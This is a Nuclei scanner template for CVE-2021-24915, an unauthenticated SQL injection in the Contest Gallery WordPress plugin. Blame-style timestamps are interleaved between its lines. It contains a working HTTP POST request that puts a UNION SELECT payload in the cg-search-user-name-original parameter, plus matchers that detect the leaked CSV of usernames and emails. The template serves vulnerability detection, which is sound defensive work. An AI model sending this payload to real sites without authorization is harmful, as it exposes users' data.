2023-10-17 07:20:28 +00:00
id : CVE-2021-24915
info :
name : Contest Gallery < 13.1.0.6 - SQL injection
author : r3Y3r53
severity : critical
description : |
The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address.
remediation : Fixed in version 13.1.0.6
reference :
- https://wpscan.com/vulnerability/45ee86a7-1497-4c81-98b8-9a8e5b3d4fac
- https://gist.github.com/tpmiller87/6c05596fe27dd6f69f1aaba4cbb9c917
- https://wordpress.org/plugins/contest-gallery/
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2021-24915
cwe-id : CWE-89
2024-04-08 11:34:33 +00:00
epss-score : 0.22351
epss-percentile : 0.96057
2023-10-17 17:52:26 +00:00
cpe : cpe:2.3:a:contest_gallery:contest_gallery:*:*:*:*:*:wordpress:*:*
2023-10-17 07:20:28 +00:00
metadata :
verified : true
2023-10-17 17:52:26 +00:00
max-request : 1
vendor : contest_gallery
product : contest_gallery
framework : wordpress
2024-03-27 21:41:40 +00:00
publicwww-query : "/wp-content/plugins/contest-gallery/"
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli
2023-10-17 07:20:28 +00:00
http :
- raw :
- |
POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'WpUserId'
- 'Username'
- 'Usermail'
condition : and
- type : word
part : header
words :
- 'text/csv'
- 'filename='
condition : and
- type : status
status :
- 200
2024-03-27 21:45:28 +00:00
# digest: 4a0a004730450220029f49c1e9fa65765eaed8f0325876a75a3da15cad0b9597a1e000f69de3c11f0221008d79ba2600b7e68952c628b0a919d453f58c97dfbc68070006af2ede9825963b:922c64590222798bb761d5b6d8e72950